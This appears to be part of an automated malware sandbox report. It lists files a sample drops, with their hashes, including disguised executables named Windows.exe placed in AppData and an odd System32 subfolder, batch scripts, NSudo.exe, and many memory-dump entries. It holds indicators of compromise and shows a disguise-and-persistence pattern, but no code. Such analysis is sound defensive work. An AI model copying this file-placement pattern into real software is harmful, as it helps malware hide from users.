C:\Users\Admin\AppData\Local\Temp\_MEI28242\python3.dll
Filesize
60KB

MD5
0812ee5d8abc0072957e9415ba6e62f2

SHA1
ea05c427e46c5d9470ba81d6b7cbca6838ee0dd5

SHA256
84a29c369560c5175d22ee764fe8ada882ab6b37b6b10c005404153518a344ec

SHA512
18ca5631f2ae957b9ec8eaa7aa87094d3a296548790ced970752625a0f271511e0ce0042a0ea5469a9c362a0d811c530ef6fe41b84c61b25c838466acc37f22b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python310.dll
Filesize
4.2MB

MD5
a1185bef38fdba5e3fe6a71f93a9d142

SHA1
e2b40f5e518ad000002b239a84c153fdc35df4eb

SHA256
8d0bec69554317ccf1796c505d749d5c9f3be74ccbfce1d9e4d5fe64a536ae9e

SHA512
cb9baea9b483b9153efe2f453d6ac0f0846b140e465d07244f651c946900bfcd768a6b4c0c335ecebb45810bf08b7324501ea22b40cc7061b2f2bb98ed7897f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python310.dll
Filesize
4.2MB

MD5
a1185bef38fdba5e3fe6a71f93a9d142

SHA1
e2b40f5e518ad000002b239a84c153fdc35df4eb

SHA256
8d0bec69554317ccf1796c505d749d5c9f3be74ccbfce1d9e4d5fe64a536ae9e

SHA512
cb9baea9b483b9153efe2f453d6ac0f0846b140e465d07244f651c946900bfcd768a6b4c0c335ecebb45810bf08b7324501ea22b40cc7061b2f2bb98ed7897f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pythoncom310.dll
Filesize
543KB

MD5
b7acfad9f0f36e7cf8bfb0dd58360ffe

SHA1
8fa816d403f126f3326cb6c73b83032bb0590107

SHA256
461328c988d4c53f84579fc0880c4a9382e14b0c8b830403100a2fa3df0fd9a9

SHA512
4fed8a9162a9a2ebc113ea44d461fb498f9f586730218d9c1cddcd7c8c803cad6dea0f563b8d7533321ecb25f6153ca7c5777c314e7cb76d159e39e74c72d1b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pythoncom310.dll
Filesize
543KB

MD5
b7acfad9f0f36e7cf8bfb0dd58360ffe

SHA1
8fa816d403f126f3326cb6c73b83032bb0590107

SHA256
461328c988d4c53f84579fc0880c4a9382e14b0c8b830403100a2fa3df0fd9a9

SHA512
4fed8a9162a9a2ebc113ea44d461fb498f9f586730218d9c1cddcd7c8c803cad6dea0f563b8d7533321ecb25f6153ca7c5777c314e7cb76d159e39e74c72d1b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pywintypes310.dll
Filesize
139KB

MD5
f200ca466bf3b8b56a272460e0ee4abc

SHA1
ca18e04f143424b06e0df8d00d995c2873aa268d

SHA256
a6700ca2bee84c1a051ba4b22c0cde5a6a5d3e35d4764656cfdc64639c2f6b77

SHA512
29bf2425b665af9d2f9fd7795bf2ab012aa96faed9a1a023c86afa0d2036cc6014b48116940fad93b7de1e8f4f93eb709cc9319439d7609b79fd8b92669b377d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pywintypes310.dll
Filesize
139KB

MD5
f200ca466bf3b8b56a272460e0ee4abc

SHA1
ca18e04f143424b06e0df8d00d995c2873aa268d

SHA256
a6700ca2bee84c1a051ba4b22c0cde5a6a5d3e35d4764656cfdc64639c2f6b77

SHA512
29bf2425b665af9d2f9fd7795bf2ab012aa96faed9a1a023c86afa0d2036cc6014b48116940fad93b7de1e8f4f93eb709cc9319439d7609b79fd8b92669b377d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\select.pyd
Filesize
25KB

MD5
63ede3c60ee921074647ec0278e6aa45

SHA1
a02c42d3849ad8c03ce60f2fd1797b1901441f26

SHA256
cb643556c2dcdb957137b25c8a33855067e0d07547e547587c9886238253bfe5

SHA512
d0babc48b0e470abdafad6205cc0824eec66dbb5bff771cee6d99a0577373a2de2ffab93e86c42c7642e49999a03546f94e7630d3c58db2cff8f26debc67fcad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\select.pyd
Filesize
25KB

MD5
63ede3c60ee921074647ec0278e6aa45

SHA1
a02c42d3849ad8c03ce60f2fd1797b1901441f26

SHA256
cb643556c2dcdb957137b25c8a33855067e0d07547e547587c9886238253bfe5

SHA512
d0babc48b0e470abdafad6205cc0824eec66dbb5bff771cee6d99a0577373a2de2ffab93e86c42c7642e49999a03546f94e7630d3c58db2cff8f26debc67fcad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\win32api.cp310-win_amd64.pyd
Filesize
131KB

MD5
ec7c48ea92d9ff0c32c6d87ee8358bd0

SHA1
a67a417fdb36c84871d0e61bfb1015cb30c9898a

SHA256
a0f3cc0e98bea5a598e0d4367272e4c65bf446f21932dc2a051546b098d6ce62

SHA512
c06e3c0260b918509947a89518d55f0cb03cb19fc28d9e7ed9e3f837d71df31154f0093929446a93a7c7da1293ffd0cc69547e2540f15e3055fe1d12d837f935

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\win32api.cp310-win_amd64.pyd
Filesize
131KB

MD5
ec7c48ea92d9ff0c32c6d87ee8358bd0

SHA1
a67a417fdb36c84871d0e61bfb1015cb30c9898a

SHA256
a0f3cc0e98bea5a598e0d4367272e4c65bf446f21932dc2a051546b098d6ce62

SHA512
c06e3c0260b918509947a89518d55f0cb03cb19fc28d9e7ed9e3f837d71df31154f0093929446a93a7c7da1293ffd0cc69547e2540f15e3055fe1d12d837f935

Download Submit
C:\Users\Admin\AppData\Roaming\Windows.exe
Filesize
87.7MB

MD5
df60cb386ba6c8195405febea841cd07

SHA1
89ca5d54ee76d2b74da26c45112e0a53adf2bbe5

SHA256
d92ea4deb8bcccd51e8271f4c2ac416033babd625f05e723d7d6f2ce52ef0687

SHA512
d341bd82e0b96c379764f428a69d12beb90261ede4156a454c2b4ec714f383766d6499617110b12e78f52d50ea4c77d5d910b246b01590fdc0374ee5f4aacf7f

Download Submit
C:\Users\Admin\AppData\Roaming\Windows3.exe
Filesize
2.8MB

MD5
1c275fd6786f0a5f96cc5fc7cd4a6a8e

SHA1
2ab2dc4e1f9af6058df82c4ff227bff887dd0644

SHA256
fd73590a6f456b7e1a046d56eae43cefaf05810d36916c9a687ee7458d44a04c

SHA512
41f8cab43f6b0c3c666cca5421cec5e35da63c1991be6fd92ad6e18cadf45ad0214f9217351653c2d46acd5769be71184409f2dfdbf3a4359990f93505b7393e

Download Submit
C:\Users\Admin\AppData\Roaming\update.bat
Filesize
456B

MD5
0d15a4dd6b715017967d373f426e8be5

SHA1
5547e3221aae8091f646e49fdbdbd1fd04750371

SHA256
c5ec4d94e82e0fb8de82869f46471849ec2fd8c307cb886744f01103e4cca578

SHA512
8a9dea40caacf1df25e942392dfab17642a6aaa60fa3c64da7e87bb3a1cb43e83e91ecece9b69edf33b55149d685b96fe7bc2a4d50891d34ddcc09de2059ebfa

Download Submit
C:\Users\Admin\Install.bat
Filesize
5KB

MD5
c712ad92bf5bdc7c860ccc478bed9f66

SHA1
53137de08709a16794619102f157194a80e38818

SHA256
f23a95df3e965832e7f098117013c5a82192179067fb44ee08d9f3847203c7bb

SHA512
299ad78109ef0ce658d0e8ba594801121d105efcb6fbd0b177ae42d3c9af0b8dd0efb2e1fe9da1a2550e1239caa03f2978c1b47f2f33d1d35e1501bc2cd46ed3

Download Submit
C:\Users\Admin\NSudo.exe
Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\NSudo.exe
Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\NSudo.exe
Filesize
247KB

MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Windows\System32\Windowsexe\Windows.exe
Filesize
87.7MB

MD5
df60cb386ba6c8195405febea841cd07

SHA1
89ca5d54ee76d2b74da26c45112e0a53adf2bbe5

SHA256
d92ea4deb8bcccd51e8271f4c2ac416033babd625f05e723d7d6f2ce52ef0687

SHA512
d341bd82e0b96c379764f428a69d12beb90261ede4156a454c2b4ec714f383766d6499617110b12e78f52d50ea4c77d5d910b246b01590fdc0374ee5f4aacf7f

Download Submit
C:\Windows\System32\Windowsexe\Windows.exe
Filesize
87.7MB

MD5
df60cb386ba6c8195405febea841cd07

SHA1
89ca5d54ee76d2b74da26c45112e0a53adf2bbe5

SHA256
d92ea4deb8bcccd51e8271f4c2ac416033babd625f05e723d7d6f2ce52ef0687

SHA512
d341bd82e0b96c379764f428a69d12beb90261ede4156a454c2b4ec714f383766d6499617110b12e78f52d50ea4c77d5d910b246b01590fdc0374ee5f4aacf7f

Download Submit
C:\Windows\System32\Windowsexe\Windows2.exe
Filesize
87.7MB

MD5
df60cb386ba6c8195405febea841cd07

SHA1
89ca5d54ee76d2b74da26c45112e0a53adf2bbe5

SHA256
d92ea4deb8bcccd51e8271f4c2ac416033babd625f05e723d7d6f2ce52ef0687

SHA512
d341bd82e0b96c379764f428a69d12beb90261ede4156a454c2b4ec714f383766d6499617110b12e78f52d50ea4c77d5d910b246b01590fdc0374ee5f4aacf7f

Download Submit
C:\Windows\System32\Windowsexe\Windows2.exe
Filesize
87.7MB

MD5
df60cb386ba6c8195405febea841cd07

SHA1
89ca5d54ee76d2b74da26c45112e0a53adf2bbe5

SHA256
d92ea4deb8bcccd51e8271f4c2ac416033babd625f05e723d7d6f2ce52ef0687

SHA512
d341bd82e0b96c379764f428a69d12beb90261ede4156a454c2b4ec714f383766d6499617110b12e78f52d50ea4c77d5d910b246b01590fdc0374ee5f4aacf7f

Download Submit
C:\Windows\System32\Windowsexe\Windows3.exe
Filesize
2.8MB

MD5
1c275fd6786f0a5f96cc5fc7cd4a6a8e

SHA1
2ab2dc4e1f9af6058df82c4ff227bff887dd0644

SHA256
fd73590a6f456b7e1a046d56eae43cefaf05810d36916c9a687ee7458d44a04c

SHA512
41f8cab43f6b0c3c666cca5421cec5e35da63c1991be6fd92ad6e18cadf45ad0214f9217351653c2d46acd5769be71184409f2dfdbf3a4359990f93505b7393e

Download Submit
memory/208-200-0x0000000000000000-mapping.dmp

Download
memory/216-201-0x0000000000000000-mapping.dmp

Download
memory/224-146-0x0000000000000000-mapping.dmp

Download
memory/224-148-0x00007FF8247E0000-0x00007FF8252A1000-memory.dmp

Filesize
10.8MB

Download
memory/488-168-0x0000000000000000-mapping.dmp

Download
memory/728-192-0x0000000000000000-mapping.dmp

Download
memory/832-196-0x0000000000000000-mapping.dmp

Download
memory/912-186-0x0000000000000000-mapping.dmp

Download
memory/1016-216-0x0000000000000000-mapping.dmp

Download
memory/1016-218-0x00007FF8243E0000-0x00007FF824EA1000-memory.dmp

Filesize
10.8MB

Download
memory/1092-215-0x0000000000000000-mapping.dmp

Download
memory/1112-164-0x0000000000000000-mapping.dmp

Download
memory/1136-227-0x00007FF8243E0000-0x00007FF824EA1000-memory.dmp

Filesize
10.8MB

Download
memory/1296-169-0x0000000000000000-mapping.dmp

Download
memory/1340-177-0x0000000000000000-mapping.dmp

Download
memory/1372-165-0x0000000000000000-mapping.dmp

Download
memory/1424-226-0x00007FF8243E0000-0x00007FF824EA1000-memory.dmp

Filesize
10.8MB

Download
memory/1424-225-0x0000000000770000-0x0000000000A3A000-memory.dmp

Filesize
2.8MB

Download
memory/1432-134-0x0000000000000000-mapping.dmp

Download
memory/1436-210-0x0000000000000000-mapping.dmp

Download
memory/1460-167-0x0000000000000000-mapping.dmp

Download
memory/1528-139-0x0000000000000000-mapping.dmp

Download
memory/1528-141-0x00007FF824590000-0x00007FF825051000-memory.dmp

Filesize
10.8MB

Download
memory/1528-140-0x0000023359650000-0x0000023359672000-memory.dmp

Filesize
136KB

Download
memory/1612-159-0x0000000000000000-mapping.dmp

Download
memory/1680-193-0x00007FF8245F0000-0x00007FF8250B1000-memory.dmp

Filesize
10.8MB

Download
memory/1680-189-0x0000000000000000-mapping.dmp

Download
memory/1692-184-0x0000000000000000-mapping.dmp

Download
memory/1692-187-0x00007FF8247E0000-0x00007FF8252A1000-memory.dmp

Filesize
10.8MB

Download
memory/1768-161-0x0000000000000000-mapping.dmp

Download
memory/1820-137-0x0000000000000000-mapping.dmp

Download
memory/1860-170-0x0000000000000000-mapping.dmp

Download
memory/1936-142-0x0000000000000000-mapping.dmp

Download
memory/1936-145-0x00007FF8247E0000-0x00007FF8252A1000-memory.dmp

Filesize
10.8MB

Download
memory/2120-194-0x0000000000000000-mapping.dmp

Download
memory/2212-199-0x0000000000000000-mapping.dmp

Download
memory/2396-231-0x00007FF8243E0000-0x00007FF824EA1000-memory.dmp

Filesize
10.8MB

Download
memory/2452-188-0x0000000000000000-mapping.dmp

Download
memory/2456-133-0x0000000000000000-mapping.dmp

Download
memory/2964-130-0x0000000000000000-mapping.dmp

Download
memory/2988-166-0x0000000000000000-mapping.dmp

Download
memory/3052-163-0x0000000000000000-mapping.dmp

Download
memory/3064-176-0x00007FF8247E0000-0x00007FF8252A1000-memory.dmp

Filesize
10.8MB

Download
memory/3064-172-0x0000000000000000-mapping.dmp

Download
memory/3076-154-0x0000000000000000-mapping.dmp

Download
memory/3188-191-0x0000000000000000-mapping.dmp

Download
memory/3276-179-0x0000000000000000-mapping.dmp

Download
memory/3396-153-0x0000000000000000-mapping.dmp

Download
memory/3456-175-0x0000000000000000-mapping.dmp

Download
memory/3460-160-0x0000000000000000-mapping.dmp

Download
memory/3540-204-0x0000000000000000-mapping.dmp

Download
memory/3548-205-0x0000000000000000-mapping.dmp

Download
memory/3548-151-0x0000000000000000-mapping.dmp

Download
memory/3584-207-0x0000000000000000-mapping.dmp

Download
memory/3612-157-0x0000000000000000-mapping.dmp

Download
memory/3620-174-0x0000000000000000-mapping.dmp

Download
memory/3668-182-0x00007FF8247E0000-0x00007FF8252A1000-memory.dmp

Filesize
10.8MB

Download
memory/3668-178-0x0000000000000000-mapping.dmp

Download
memory/3764-183-0x0000000000000000-mapping.dmp

Download
memory/3844-181-0x0000000000000000-mapping.dmp

Download
memory/3848-149-0x0000000000000000-mapping.dmp

Download
memory/3868-150-0x0000000000000000-mapping.dmp

Download
memory/3924-211-0x0000000000000000-mapping.dmp

Download
memory/3924-213-0x00007FF8243E0000-0x00007FF824EA1000-memory.dmp

Filesize
10.8MB

Download
memory/3996-197-0x0000000000000000-mapping.dmp

Download
memory/4104-214-0x0000000000000000-mapping.dmp

Download
memory/4168-132-0x0000000000000000-mapping.dmp

Download
memory/4468-195-0x0000000000000000-mapping.dmp

Download
memory/4484-198-0x0000000000000000-mapping.dmp

Download
memory/4488-171-0x0000000000000000-mapping.dmp

Download
memory/4536-136-0x0000000000000000-mapping.dmp

Download
memory/4672-135-0x0000000000000000-mapping.dmp

Download
memory/4764-155-0x0000000000000000-mapping.dmp

Download
memory/4768-156-0x0000000000000000-mapping.dmp

Download
memory/4856-162-0x0000000000000000-mapping.dmp

Download
memory/4860-203-0x0000000000000000-mapping.dmp

Download
memory/4904-202-0x0000000000000000-mapping.dmp

Download
memory/5108-208-0x0000000000000000-mapping.dmp

Download